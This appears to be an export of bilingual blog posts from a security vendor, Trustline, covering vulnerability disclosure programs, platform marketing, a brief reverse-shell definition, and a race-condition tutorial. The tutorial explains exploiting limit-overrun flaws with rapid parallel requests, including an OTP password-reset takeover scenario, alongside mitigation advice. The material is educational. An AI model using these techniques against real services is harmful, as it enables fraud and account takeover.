	<li>ترست لاين أسسمنت: يقدم ترست لاين أسسمنت اختبار الاختراق كخدمة، وهو نهج قائم على نموذج البرمجيات كخدمة لإدارة وتنسيق أنشطة اختبارات الاختراق. تشمل هذه الاختبارات محاكاة للهجمات السيبرانية التي يتم إجراؤها بواسطة محترفين مهرة في مجال الأمن السيبراني لتحديد وتقييم خطورة الثغرات في الأصول الرقمية لمؤسستك. نوفر حلول للعملاء من خلال اختيار مواعيد وإدارة اختبارات الاختراق الخاصة بهم، بالإضافة إلى ربطهم مع مختبرين أختراق ذوي كفاءات عالية. هذه الأنشطة المنهجية المحددة بوقت معين تضمن اختبار أنظمتك بشكل شامل وتعزيزها ضد الهجمات المحتملة.</li>
</ul>

من خلال دمج خدمات ترست لاين هذه في عملية التطوير الخاصة بك، يمكن لمنظمتك بناء برمجيات آمنة بثقة، وتقليل خطر الانتهاكات، والحفاظ على الامتثال للوائح الصناعة. يساعدك ترست لاين على أولوية الأمن في كل مرحلة، مما يحمي علامتك التجارية من الأضرار المالية والسمعة السيئة المرتبطة في الهجمات السيبرانية.

&nbsp;

تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> أستخدم هذه التحديات السيبرانية التي قد تواجهك الى فرص للنمو لمنشأتك

How Secure Software Development is Key to Avoiding Costly Breaches

كيف يؤدي تطوير البرمجيات الآمن إلى تجنب الثغرات الأمنية المكلفة

How-Secure-Software-Development-is-Key-to-Avoiding-Costly-Breaches

In today’s digital age, organizations face a growing number of cyber threats. From data breaches to ransomware attacks, the consequences of weak security practices are not only damaging to an organization's reputation but

في عصرنا الرقمي الحالي، تواجه المنظمات عددًا متزايدًا من التهديدات السيبرانية. من اختراقات البيانات إلى هجمات الفدية، فإن عواقب ممارسات الأمن الضعيفة ليست فقط ضارة بسمعة المنظمة ولكن

&nbsp;

In today&#39;s interconnected digital landscape, the constant evolution of technology brings with it an array of security challenges. With cyber threats becoming increasingly sophisticated, organizations are realizing the critical importance of collaboration and transparency with the cybersecurity community to protect their digital assets effectively. for this reason, Vulnerability Disclosure Programs (VDPs) are emerging. Here&rsquo;s why you need one, and instructions on starting one or improving your current process.

&nbsp;

<h2>What Is a Vulnerability Disclosure Program?</h2>

A VDP is a structured method for anyone to report vulnerabilities easily. VDPs should include a process for receiving a vulnerability report, prioritizing and remediating vulnerabilities, and setting expectations for follow-ups, such as remediation.

&nbsp;

<h2>Why All Organizations Need a Vulnerability Disclosure Program?</h2>

VDPs provide a central place for third parties to report a vulnerability so security teams can quickly assess and remediate it. VDP&rsquo;s reduce the chances someone will publicly disclose a bug without the organization&rsquo;s knowledge. When someone who finds a vulnerability publicly discloses flaws t, they alert both customers and cybercriminals to the vulnerability. This practice harms the brand&rsquo;s image and exposes the company to unnecessary risk. Language within the VDP protects those who submit vulnerability reports from legal action, providing finders with a process to come forward and disclose found vulnerabilities. When a vulnerability is brought directly to organizations for remediation, staff can prioritize the bug, develop a patch, and notify finders on their terms. As a result of having a vulnerability intake process, companies are able to combat public vulnerability disclosures. Bringing vulnerabilities directly to an organization in a coordinated disclosure fashion is considered a best practice in accordance with many global mandates. Hackers can uncover vulnerabilities such as cross-site scripting and forgery, SQL injection attacks, and privilege escalation through a VDP. Discovering these flaws before bad actors do allows organizations to patch vulnerabilities before exploitation by cybercriminals.&nbsp;VDPs also provide increased visibility into the kind, number, and severity of vulnerabilities companies face. Understanding the attack surface and average remediation times allows organizations to improve their operational processes and approach cybersecurity proactively.&nbsp;VDPs can help organizations pass audits and provide proof of compliance through attestation reports.&nbsp;<a href="https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2015-01-22">The National Institute of Standards and Technology (NIST)</a>,&nbsp;in&nbsp;a 2020 update to their &ldquo;Security and Privacy Controls for Information Systems,&rdquo; outlined best practices for organizations looking to mitigate risk and positioned VDPs as a core component of every security strategy. Another standard published by&nbsp;<a href="https://www.iso.org/standard/45170.html">ISO 29147</a>&nbsp;provides requirements and recommendations to vendors on disclosing vulnerabilities in products and services.

&nbsp;

<h2>Vulnerability Disclosure Program Pillars :</h2>

Every successful VDP consists of at least five core components. Each plays a crucial role and protects the relationship between the finder and the business. Below are descriptions of the components and explanations of their importance.

<h3>Promise Statement :</h3>

The promise statement lets everyone know why an organization has a VDP. An organization&#39;s promise statement demonstrates to the public that they are proactive regarding vulnerabilities and take threats seriously. Through an opening statement, organizations show customers and investors the organization&#39;s level of dedication to ongoing cybersecurity&mdash;outside of educating researchers.

<h3>Scope :</h3>

Scope defines the indicated systems and products for security research. The scope&rsquo;s guidelines list domains and products suitable for testing while also restricting specific hacker testing areas. social engineering attempts are a few of the commonly restricted tests.

<h3>Safe Harbor :</h3>

Safe harbor fosters a secure and productive VDP by protecting those who disclose vulnerabilities from legal action. This section is essential to safeguard and encourage hackers to disclose bugs through an organization&#39;s official channel.&nbsp;Hackers who find a bug often avoid disclosing it because the risk of legal action is too significant or not understood. Without a detailed safe harbor section, hackers may avoid disclosing for fear of retribution. Trustline includes safe-harbor&nbsp;language by default for all new VDP launches.

<h3>Process Description :</h3>

The process description details the report submission and remediation process. Reports should include the vulnerability&rsquo;s severity, how attackers can exploit it, and how developers can reproduce the bug. This information helps security teams prioritize threats and quickly validate new disclosures. A thorough process description can dramatically reduce remediation time and minimize your exposure to attack through prioritization.&nbsp;Vulnerability disclosures may lack the details the remediation team needs to validate and patch the bug without a process description. Lacking a description can slow the patching process and leave systems exposed longer than necessary.

<h3>Preferences :</h3>

The preferences section sets expectations for how your organization will evaluate reports. Process workflow should include expected response times, whether the organization will publicly disclose bugs, and if the hacker will receive a confirmation upon repair.&nbsp;Communication is essential in building a solid relationship between hackers and organizations. Hackers want to know that organizations pay attention to their submissions and take them seriously. Otherwise, frustrated hackers may prematurely and publicly disclose vulnerabilities if they feel an organization isn&#39;t responsive or actively working on a known bug.&nbsp;The communication process also helps internal teams prioritize and patch bugs while setting time-based goals for response and remediation. Regardless of how long a bug takes to fix, transparent communication between organizations and hackers builds trust and confidence within the VDP.&nbsp;Organizations&rsquo; preferences help guide remediation and control how disclosure occurs. While many consider it best practice to disclose bugs, it is not mandatory to do so. Organizations working on sensitive projects may opt to push patches out and not disclose bugs publicly.

&nbsp;

<h2>How Trustline Can Help :</h2>

In the past, designing a VDP required a significant investment of both time and money. Organizations typically developed policies from scratch, built new communication channels, and marketed their platforms.

Trustline&nbsp;provides all the tools needed to launch a successful VDP from a single platform. Our out-of-the-box setup makes it easy to establish a compliant and policy-driven vulnerability disclosure workflow for continuous security.&nbsp;<a href="mailto:info@trustline.sa">Contact us&nbsp;</a>to start your VDP today.

&nbsp;

تخيل عالمنا بدون تطبيقات توصيل، ولا مواقع حجز تذاكر سفر أو حتى بدون هواتف ذكية وإنترنت. النتيجة هي عالم من الصعب العيش فيه. الثورة التقنية سهلت حياة البشرية في مختلف المجالات ابتداء التواصل الصوتي والمرئي وانتهاء بإدارة أموالك واستثماراتك بضغطة زر. لكن هنالك تحديات كبيرة مصاحبة للتطور التقني الذي نعيشه فالتهديدات الأمنية والاختراقات أصبحت أكثر انتشارا وتعقيدا. في هذه الحرب ضد الاختراقات أدركت المنشآت أهمية التعاون مع مجتمع الأمن السيبراني لحماية أصولهم الرقمية بفعالية، ومن أبرز طرق التعاون ما يسمى ببرامج الإفصاح عن الثغرات&nbsp;( Vulnerability Disclosure Program ). في هذه المدونة سنشرح ما هي هذه البرامج وأهميتها وما هي أفضل الإرشادات المتبعة في إنشائها.

&nbsp;

<h2 dir="rtl">ما هي برامج الإفصاح عن الثغرات؟</h2>

هي برامج توفر هيكلة و آليه عمل واضحة للأشخاص الذين يريدون التبليغ عن ثغرة أمنية تم إيجادها في أحد الأصول الرقمية التابعة لمنشاة ما. برامج الإفصاح عن الثغرات يجب أن تشمل على سياسة التبليغ عن الثغرات، وسيلة تواصل لمتابعة إغلاق الثغرة الأمنية. كما تحتوي هذه البرامج على بيان قانوني يحمي من قام بالتبليغ عن الثغرة من أي تبعات قانونية، وذلك مما يساهم في تحفيز مجتمع الأمن السيبراني للمبادرة في التبليغ عن الثغرات من خلال هذه البرامج.&nbsp;

&nbsp;

<h2 dir="rtl">أهمية برنامج كشف الثغرات وضرورة توفرها لدى جميع الجهات :</h2>

توفر برامج الإفصاح عن الثغرات قناة رسمية لأي شخص يريد الإبلاغ عن ثغرة بحيث يمكن لفريق الأمن السيبراني في المنشآت بمعالجتها وإصلاحها. فمن خلال آلية عملها، يتم التقليل من احتمالية قيام شخص كشف الثغرة الأمنية في وسائل التواصل الاجتماعي أو للعامة. في المقابل عدم توفر قناة رسمية للتبليغ عن الثغرات الأمنية قد يضر المنشاة، ويؤثر على سمعتها، ويضعها في خطر كبير كان من الممكن تجنبه حيث يتيح فرصة للمجرمين باستغلال الثغرة واستخدامها لمصالحهم السيئة. يضم برنامج الكشف عن الثغرات بيان قانوني يحمي الأشخاص الذين قامو بالإبلاغ عن ثغرات اكتشفوها مما يساهم في جعل مجتمع الأمن السيبراني أكثر ارتياحا ورغبتا في الإفصاح عن الثغرات التي وجدوها للشركة. وجود إليه لكشف الثغرات يساهم في حماية الشركات من انتشار ثغراتها الأمنية علنا.&nbsp;وجود آلية واضحة لإيصال الثغرات الأمنية إلى الجهات يعتبر من أفضل الممارسات في مجال الأمن السيبراني. كما أنها تساعد المنظمات بالالتزام بمعايير الأمن السيبراني العالمية مثل ( NIST ) و ( ISO 29147 ) والتي اعتبرت برامج الإفصاح عن الثغرات مكوناً أساسياً في كل استراتيجية أمنية، وحثت المنظمات التي تتطلع إلى تقليل الأخطار السيبرانية بالالتزام بذلك.&nbsp;إضافة إلى ذلك، تساهم هذه البرامج في زيادة الوعي لدى المنشأة من خلال معرفة عدد ونوع الثغرات المتواجدة في أصولها الرقمية. كما تساعد المنشأة على معرفة الأسباب الرئيسة لوجود هذه الثغرات ومعرفة متوسط الوقت لإصلاحها مما يساهم في بناء وتطوير أنظمة آمنة في المستقبل وتبني أفضل للمنهجيات والممارسات الاستباقية في الأمن السيبراني.

&nbsp;

<h2 dir="rtl">المكونات الأساسية في برامج الإفصاح عن الثغرات :</h2>

كل برنامج كشف ثغرات ناجح يجب أن يتكون من خمس مكونات أساسية على الأقل. كل منها يلعب دور مهم في حماية وإدارة العلاقة بين مكتشف الثغرة والمنشاة. فيما يلي وصف لهذه المكونات وأهميتها.

<h3 dir="rtl">بيان تعهد : </h3>

يبين بيان التعهد للجميع ما هدف المنشأة من امتلاك برنامج كشف للثغرات، ويوضح للجميع أن المنشأة تقوم بتبني حلول استباقية لحماية تطبيقاتها وتتعامل مع الأخطار السيبرانية بجدية. من خلال بيان التعهد توضح المنظمة لعملائها ومستثمريها أنها ملتزمة ومبادرة في حماية أصولها الرقمية.

<h3 dir="rtl">نطاق&nbsp;العمل :</h3>

نطاق العمل يوضح للباحثين الأمنيين ماهي الأنظمة والتطبيقات التي تندرج تحت البرنامج. يمثل قواعد إرشادية لتوضيح ما هي الأنظمة المسموح اختبارها وما هي أنواع الاختبارات المسموحة.

<h3 dir="rtl">الحصانة القانونية&nbsp;:</h3>

تعزز الحصانة القانونية من كون برامج الكشف عن الثغرات أكثر فعالية من خلال حماية الأشخاص الذين يريدون التبليغ عن ثغرة موجوده في أنظمة المنشاة. يعتبر هذا القسم من أكثر الأقسام أهمية حيث يشجع الهاكرز لتبليغ عن ثغرات موجودة في أنظمة الشركة من خلال قنوات التواصل المخصصة لذلك. في كثير من الأحيان يتجنب الهاكرز من التبليغ عن الثغرات لخطورة الأمر خوفا من أن يترتب على ذلك إجراءات قانونية ضدهم.

<h3 dir="rtl">شرح لآلية العمل :&nbsp;</h3>

آلية العمل توضح على نحو مفصل كيفية تسليم تقارير الثغرات. حيص يفضل أن تحتوي هذه التقارير على خطورة الثغرة، وماهي آلية اختراقها، وكيف للمبرمج إصلاحها. هذه المعلومات تساعد فريق الأمن السيبراني على ترتيب الأولويات والتحقق من وجود الثغرة بشكل أسرع. وجود آلية عمل واضحة ومتكاملة يقلل من فترة إصلاح الثغرة ( Remediation Time ) مما يساهم في جعل المنظمة أكثر أمانا وتقليل احتمالية استغلال الثغرة من قبل المجرمين السيبرانيين.

<h3 dir="rtl">التفضيلات :</h3>

يوضح هذا القسم التوقعات في كيفية آلية عمل المنشاة في مراجعة الثغرات. على سبيل المثال ما هي الفترة المتوقعة للرد ، هل سوف يتم الإفصاح عن الثغرة للعامة ،وهل سوف يتم تحديث من قام بالتبليغ بأنه تم إصلاح الثغرة. التواصل له أهمية عالية فهو الأساس في بناء علاقة بين المنشاة و مجتمع الأمن السيبراني. يهتم الهاكرز في معرفة ما إذا كانت المنظمة يأخذون حماية أصولهم بجدية وأنها تستقبل التقارير المرسلة إليهم بطريقة احترافية.لأنه في حال انتفاء ذلك قد يتم كشف الثغر للعامة من قبل هاكر أحبط من طريقة تعامل المنشاة وعدم تفاعلها.&nbsp;

&nbsp;

<h2 dir="rtl">كيف ترست لاين تساعدك :</h2>

إنشاء برنامج متكامل للإفصاح عن الثغرات يتطلب استثماراً في المال والوقت والجهد. فالأمر يتطلب بناء سياسات دقيقة ومتابعة مستمرة بالإضافة لتطوير حل تقني لذلك.&nbsp;من خلال ترست لاين في دي بي ( Trustline VDP ) ، نمكّن المنشآت من بناء برنامجهم الخاص المطابق للمعايير العالمية ونساعدهم في إدارتها ومتابعتها من خلال منصة متكاملة مخصصة لذلك.&nbsp;ساهم في حماية منشأتك و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> لبناء برنامجك الخاص للإفصاح عن الثغرات.

Introduction-to-Vulnerability-disclosure-program

In today's interconnected digital landscape, the constant evolution of technology brings with it an array of security challenges..

تخيل عالمنا بدون تطبيقات توصيل، ولا مواقع حجز تذاكر سفر أو حتى بدون هواتف ذكية وإنترنت. النتيجة هي عالم من الصعب العيش فيه..

We Are All Responsible | Introduction to Vulnerability Disclosure Program

كلنا مسؤول، نبذة عن برامج الإفصاح عن الثغرات وآلية عملها

Netcat-Reverse-Shells

A Reverse Shell is essentially a session that initiates from a remote machine i.e. target machine towards the attacker machine. The attacker machine is listening on a specified port for communication, on which it receives connection from the target machine.

الاتصال العكسي هو في الأساس جلسة يتم بدء تشغيلها من جهاز بعيد، أي الجهاز المستهدف، نحو الجهاز المهاجم. يستمع الجهاز المهاجم على منفذ محدد للاتصال، حيث يتلقى اتصالاً من الجهاز المستهدف

Netcat Reverse Shells

تكنيك ال Netcat Reverse Shells

<h2>In the ever-evolving world of security, organizations often find themselves reacting to new challenges and emerging attack surfaces. This reactive approach demands significant time, resources, and budgets from already stretched security teams.</h2>

&nbsp;

This is where crowdsourced security shines. Its inherent scalability and agility make it the only solution capable of staying ahead of new threats. By harnessing human ingenuity, organizations can proactively address security issues without the constant scramble for new solutions. Crowdsourced security ensures you remain prepared for tomorrow&rsquo;s challenges.

Navigating the crowded market of crowdsourced security vendors can be daunting. The Trustline Platform offers a contemporary and effective approach to proactively manage cybersecurity threats.

Through numerous conversations with Trustline customers, several trends have emerged. These customers often faced similar challenges and found Trustline to be an ideal solution. Here are four key reasons why organizations choose Trustline for their cybersecurity needs:

&nbsp;

<ol>
	<li style="list-style-type:decimal">Versatile SaaS Platform Trustline&#39;s multi-solution SaaS platform integrates technology, data, and engineered services, extending the benefits of crowdsourcing to pen testing, attack surface management, and beyond. Our platform leverages a decade&rsquo;s worth of security knowledge, enabling us to provide contextual intelligence across all solutions.</li>
	<li style="list-style-type:decimal">Effective Crowd Management Trustline&rsquo;s unique technology ensures the selection of the right hackers for each task. Unlike other vendors that tout large numbers of participants, Trustline focuses on matching hackers with the appropriate skills and experience, increasing engagement and critical findings by 102% over traditional methods.</li>
	<li style="list-style-type:decimal">Advanced Security Program Management Trustline&rsquo;s innovative approach to security program management offers flexibility, reduced administrative burden, and detailed reporting. It supports various organizational needs, including managing assets across departments, handling mergers and acquisitions, and facilitating multiple engagements efficiently. This ensures data-driven innovation and swift delivery of new capabilities.</li>
	<li style="list-style-type:decimal">Commitment to Customer Success Trustline views its customers as long-term partners, tailoring support to their unique journeys. Our commitment to customer satisfaction is evident in positive feedback, highlighting the team&rsquo;s responsiveness, expertise, and dedication to ensuring successful security programs.</li>
</ol>

Security teams consistently rely on Trustline for their cybersecurity challenges. We recognize the multitude of options available and strive to make Trustline the preferred choice. 
 
If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec" rel="noopener noreferrer" tabindex="0">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/" rel="noopener noreferrer" tabindex="0">LinkedIn</a>&nbsp;and To learn more About our Products , <a href="https://www.trustline.sa/contact-us" rel="noopener noreferrer" tabindex="0">contact us</a> today to benefit from our security community.

&nbsp;

في عالم الأمن السيبراني المتطور، تجد المؤسسات نفسها غالبًا تتفاعل مع التحديات الجديدة في المساحات السيبرانية. يتطلب هذا النهج التفاعلي وقتًا وموارد وميزانيات كبيرة من فرق الأمن المنهكة بالفعل. 
 
هنا يأتي دور الأمن القائم على المجتمع الأمني، حيث تجعله قابلية التوسع والمرونة المتأصلة الحل الوحيد القادر على مواكبة التهديدات الجديدة. من خلال تسخير والاستفادة من خلال مجتمعنا الأمني ذو الخبرات، يمكن للمؤسسات معالجة مشكلات الأمن بشكل استباقي دون اللجوء المستمر إلى حلول جديدة. تضمن الاستراتيجية الأمنية القائمة على المجتمع الأمني استعدادك للتحديات القادمة. 
 
تقدم منصة ترست لاين نهجًا عصريًا وفعالًا لإدارة تهديدات الأمن السيبراني بشكل استباقي. 
 
من خلال العديد من المحادثات مع عملاء ترست لاين، برزت عدة استنتاجات. واجه هؤلاء العملاء في كثير من الأحيان تحديات مماثلة ووجدوا أن ترست لاين هي الحل الأمثل. فيما يلي أربعة أسباب رئيسية لاختيار المؤسسات لترست لاين لتلبية احتياجاتها الأمنية السيبرانية: 
 
منصة SaaS متعددة الاستخدامات: 
&nbsp;تجمع منصة ترست لاين SaaS حلول متعددة مما يوسع من دائرة الاستفادة من المجتمع الأمني لتشمل اختبار الاختراق وإدارة نوعية المخاطر والتهديدات السيبرانية وغير ذلك. وتتميز منصتنا بمجتمع أمني متفاني، مما يتيح لنا تقديم معلومات ونتائج مختلفة عبر جميع الحلول الي تقدمها المنصة.

 
إدارة فعالة للمجتمع الأمني: 
&nbsp;تضمن منهجية ترست لاين الفريدة اختيار الهاكرز المناسبين لكل مهمة. على عكس مزودين الخدمات السيبرانية الآخرين نحن نفتخر بأعداد كبيرة من المشاركين من مجتمعنا الأمني، تركز ترست لاين على مطابقة الهاكرز بالمهارات والخبرات المناسبة مع احتياجات المؤسسة الأمنية، مما يزيد من المشاركة الفعالة وبلاغات الثغرات الحرجة مقارنة بالطرق التقليدية.

 
إدارة متقدمة للبرامج الأمنية: 
&nbsp;توفر منصة ترست لاين نهجاً مبتكر لإدارة برامج الأمن بمرونة عالية وتقليل العبء الإداري وتقديم تقارير مفصلة. تدعم الاحتياجات التنظيمية والتشريعية والإدارية المختلفة، بما في ذلك إدارة الأصول الرقمية ، والتعامل مع عمليات الدمج والاستلام، وتسهيل مشاركات أمنية متعددة بكفاءة. يضمن هذا النهج الابتكار القائم على البيانات والتسليم السريع للتقارير الأمنية.

 
الالتزام بنجاح العميل: 
&nbsp;تنظر ترست لاين إلى عملائها على أنهم شركاء طويلو الأمد، يتضح التزامنا برضا العملاء من خلال التعليقات الإيجابية، والتي تسلط الضوء على استجابة الفريق وخبرته وتفانيه مع جهود مجتمعنا الأمني في سبيل ضمان نجاح برامج عملائنا الأمنية.

 
تعتمد الفرق الأمنية لعملائنا باستمرار على ترست لاين لمواجهة تحديات الأمن السيبراني الخاصة بها. نحن ندرك تعدد الخيارات المتاحة ونحرص على جعل ترست لاين الخيار الأفضل. لاستكشاف منصة ترست لاين بشكل أكبر، قم بجولة سريعة على خدماتنا ومنتجاتنا في المنصة. 
&nbsp;

يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل<a href="http://twitter.com/TrustlineSec" rel="noopener noreferrer" tabindex="0"> تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/" rel="noopener noreferrer" tabindex="0">لينكد إن</a>، ساهم في حماية منشأتك و تواصل معنا للاستفادة من منتجاتنا الأمنية

4 Reasons Why Customers Trust the Trustline Platform

أربعة أسباب تجعل العملاء يثقون بمنصة ترست لاين

4-Reasons-Why-Customers-Trust-the-Trustline-Platform

In the ever-evolving world of security, organizations often find themselves reacting to new challenges and emerging attack surfaces. This reactive approach demands significant time, resources, and budgets from already stretched security teams.

في عالم الأمن السيبراني المتطور، تجد المؤسسات نفسها غالبًا تتفاعل مع التحديات الجديدة في المساحات السيبرانية. يتطلب هذا النهج التفاعلي وقتًا وموارد وميزانيات كبيرة من فرق الأمن المنهكة بالفعل.

<h2>What is Race Condtion 
&nbsp; 
Race conditions are like those unexpected moments when you have multiple people trying to access the same thing at the same time, causing chaos and confusion. In the world of websites, this can happen when requests are processed concurrently without proper precautions. It&#39;s like a collision of threads, where different tasks are trying to interact with the same data simultaneously. This collision can lead to unexpected behavior in the application, and that&#39;s where the trouble begins. Attackers can take advantage of these race conditions by strategically timing their requests to intentionally cause collisions and exploit the resulting chaos for their own malicious purpos</h2>

<h2><img alt="" src="/media/blog/2024/05/13/chrome_oi9wgk3q6y.png" style="height:458px; width:1217px" /></h2>

<h2> 
When it comes to race conditions, there&#39;s a specific timeframe called the &quot;race window&quot; where collisions can happen. It&#39;s like a tiny gap, maybe just a fraction of a second, that exists between two interactions with the database or other components. 
&nbsp; 
Now, the extent of damage caused by a race condition varies greatly depending on the application itself and the particular functionality that&#39;s affected by it. It&#39;s one of those&nbsp; 
situations where the impact can be different for each application, depending on how it&#39;s built and what features are involved</h2>

<h2>&nbsp;</h2>

<h2>Example Exceeding Boundaries: Understanding and Addressing Limit Overrun Race Conditions</h2>

One of the most well-known race conditions occurs when you manage to surpass a limit that is set by the business rules of an application. 
To illustrate this, let&#39;s consider an example of an online store that allows customers to enter a promotional code during the checkout process to receive a one-time discount on their order. The application typically goes through the following steps:

&nbsp;

<ol>
	<li>First, it checks whether you have already used this particular code.</li>
	<li>If not, it applies the discount to the total amount of your order.</li>
	<li>Finally, it updates the database to indicate that you have now utilized this code.</li>
</ol>

Now, let&#39;s say you attempt to reuse the same code again. In theory, the initial checks carried out at the beginning of the process should prevent you from doing so.

<img alt="" src="/media/blog/2024/05/13/chrome_uksmkpxiqm.png" style="height:679px; width:1255px" />

Now, let&#39;s imagine a situation where a user who has never used a specific discount code before tries to apply it twice, almost simultaneously:

<img alt="" src="/media/blog/2024/05/13/chrome_thn0pp3zsn.png" style="height:443px; width:1200px" />

.When a user who hasn&#39;t used a discount code before tries to apply it twice almost simultaneously, there is a temporary state in the application. This state starts when the server begins processing the first request and ends when the database is updated to reflect that the code has been used. During this short period, known as the &quot;race window,&quot; the user can repeatedly claim the discount code multiple times. It&#39;s like a brief opportunity where the system&#39;s safeguards momentarily allow for exploiting the situation and taking advantage of the discount multiple times.

&nbsp;

<h2>Identifying and exploiting limit overrun race conditions:</h2>

Exploring and exploiting limit overrun race conditions involves a straightforward process. In simple terms, here&#39;s what you need to do:

<ol>
	<li>Identify an endpoint that enforces single-use or rate limitations with some security impact or useful purpose.</li>
	<li>Send multiple requests to this endpoint in rapid succession to test if you can surpass these limitations.</li>
</ol>

 
The main challenge lies in timing the requests in such a way that two or more race windows align, resulting in a collision. These windows are often extremely brief, lasting just milliseconds or even less. 
However, it&#39;s important to note that even if you send all the requests simultaneously, there are external factors beyond your control that can influence when the server processes each request and in what order they are handled. These factors can introduce unpredictability into the timing of the requests.

&nbsp;

<h2>Real-World Example:</h2>

Imagine a situation where a web application allows users to reset their passwords by receiving a One-Time Password (OTP) and there was a Race Condition &nbsp;flaw in the system, which opened up an opportunity for attackers. 
Here&#39;s how it worked: When someone requested a password reset, the application would send out an OTP to their phone number. However, due to the Race Condition vulnerability, a clever attacker could exploit this weakness. 
The attacker would craft two requests simultaneously: one with their own phone number and another with the victim&#39;s phone number. By sending these requests at the exact same time, they could trick the system into sending the same OTP to both numbers.

&nbsp;

<h2>Preventing Race Condition Vulnerabilities:</h2>

To mitigate race condition vulnerabilities in your application, follow these guidelines:

<ol>
	<li>Separate data sources: Avoid mixing data from different sources to prevent conflicts and inconsistencies.</li>
	<li>Implement atomic operations: Use concurrency features provided by your data store to ensure that state changes occur atomically. This helps maintain data integrity and prevents race conditions.</li>
	<li>Utilize integrity checks: Leverage integrity and consistency features of your data store, such as column uniqueness constraints, to add an extra layer of protection.</li>
	<li>Diversify storage layers: Relying on a single storage layer, such as sessions, is not sufficient. Avoid securing one layer with another and implement additional security measures.</li>
	<li>Maintain session consistency: Ensure that your session handling framework maintains internal consistency. Avoid updating session variables individually, as this can introduce vulnerabilities.</li>
</ol>

Implementing these proactive steps can significantly reduce the likelihood of encountering race condition vulnerabilities in your application. 
&nbsp;

&nbsp;

&nbsp;

<h2>ما هي حالة التنافس Race Condition</h2>

تشبه حالات التنافس تلك اللحظات غير المتوقعة عندما يحاول العديد من الأشخاص الوصول إلى نفس الشيء في نفس الوقت، مما يتسبب في الفوضى والارتباك. في عالم المواقع الإلكترونية، يمكن أن تحدث هذه الحالة عندما تتم معالجة الطلبات بشكل متزامن دون احتياطات مناسبة. إنها مثل تصادم المسارات، حيث تحاول المهام المختلفة التفاعل مع نفس البيانات في نفس الوقت. يمكن أن يؤدي هذا الاصطدام إلى سلوك غير متوقع في التطبيق، وهنا تبدأ المشكلة. يمكن للمهاجمين الاستفادة من حالات التنافس هذه عن طريق توقيت طلباتهم بشكل استراتيجي لتسبب الاصطدامات بشكل متعمد واستغلال الفوضى الناتجة لأغراضهم الخبيثة.

<img alt="" src="/media/blog/2024/05/13/chrome_oi9wgk3q6y_gFGAmQc.png" style="height:458px; width:1217px" />

عندما يتعلق الأمر بحالات التنافس، هناك إطار زمني محدد يُسمى &quot;نافذة التنافس&quot; حيث يمكن حدوث الاصطدامات. إنها مثل فجوة صغيرة، ربما تكون جزءًا من الثانية فقط، تتواجد بين تفاعلين مع قاعدة البيانات أو مكونات أخرى.

الآن، يختلف مدى الضرر الناتج عن حالة التنافس بشكل كبير اعتمادًا على التطبيق نفسه والوظيفة المحددة التي تتأثر بها. إنها واحدة من تلك الحالات التي يمكن أن يكون لها تأثير مختلف على كل تطبيق، اعتمادًا على كيفية بنائه والميزات التي تشملها.

&nbsp;

<h2>أمثلة تجاوز الحدود:</h2>

<h2>فهم ومعالجة حالات التنافس في تجاوز الحدود إحدى أشهر حالات التنافس تحدث عندما تتمكن من تجاوز الحد الذي يتم تحديده بقواعد العمل لتطبيق ما. لتوضيح ذلك، دعونا ننظر إلى مثال من متجر على الإنترنت يسمح للعملاء بإدخال رمز ترويجي أثناء عملية الخروج للحصول على خصم لمرة واحدة على طلبهم. يقوم التطبيق عادة بالخطوات التالية:</h2>

<ol>
	<li>اولاً، يتحقق مما إذا كنت قد استخدمت بالفعل هذا الرمز المحدد.</li>
	<li>إذا لم يكن الأمر كذلك، فإنه يطبق الخصم على المبلغ الإجمالي لطلبك.</li>
	<li>وأخيرًا، يُحدث قاعدة البيانات للإشارة إلى أنك استخدمت هذا الرمز الآن.</li>
</ol>

الآن، لنفترض أنك تحاول إعادة استخدام نفس الرمز مرة أخرى. في النظرية هذه، يجب أن تمنعك الفحوصات الأولية التي تتم في بداية العملية من فعل ذلك.

<img alt="" src="/media/blog/2024/05/13/chrome_uksmkpxiqm_9OLFFpv.png" style="height:679px; width:1255px" />

&nbsp;

الآن، لنتخيل وضعًا حيث يحاول مستخدم لم يستخدم رمز خصم معين من قبل تطبيقه مرتين تقريبًا في نفس الوقت:

<img alt="" src="/media/blog/2024/05/13/chrome_thn0pp3zsn_q9IpWzh.png" style="height:443px; width:1200px" />

عندما يحاول مستخدم لم يستخدم رمز خصم من قبل تطبيقه مرتين تقريبًا في نفس الوقت، يوجد حالة مؤقتة في التطبيق. تبدأ هذه الحالة عندما يبدأ الخادم في معالجة الطلب الأول وتنتهي عندما يتم تحديث قاعدة البيانات ليعكس أن الرمز قد تم استخدامه. خلال هذه الفترة القصيرة، المعروفة باسم &quot;نافذة التنافس&quot;، يمكن للمستخدم المطالبة برمز الخصم مرارًا وتكرارًا. إنها مثل فرصة قصيرة حيث تسمح حواجز النظام مؤقتًا بالاستفادة من الوضع والاستفادة من الخصم مرارًا وتكرارًا.

<h2>&nbsp;</h2>

<h2>تحديد واستغلال حالات التنافس في تجاوز الحدود:</h2>

<h2>ينطوي استكشاف واستغلال حالات التنافس في تجاوز الحدود على عملية مباشرة. ببساطة، إليك ما عليك القيام به:</h2>

<ol>
	<li>تحديد نقطة نهاية تفرض قيودًا على الاستخدام الفردي أو معدلات الاستخدام مع بعض التأثير الأمني أو الغرض الفعّال</li>
	<li>. إرسال طلبات متعددة إلى هذه النقطة في تعاقب سريع لاختبار ما إذا كنت قادرًا على تجاوز هذه القيود.</li>
</ol>

التحدي الرئيسي يكمن في توقيت الطلبات بطريقة تجعل نوافذ التنافس اثنتان أو أكثر تتوافق، مما يؤدي إلى اصطدام. غالبًا ما تكون هذه النوافذ قصيرة للغاية، وقد تستمر لمدة ثوانٍ مللي أو أقل. ومع ذلك، من المهم أن نلاحظ أنه حتى إذا أرسلت جميع الطلبات متزامنة، هناك عوامل خارجية خارجة عن سيطرتك يمكن أن تؤثر على موعد معالجة الخادم لكل طلب وفي أي ترتيب يتم معالجتها. يمكن أن تُدخل هذه العوامل عدم التنبؤ في توقيت الطلبات.

&nbsp;

<h2>مثال من الحياة الواقعية:</h2>

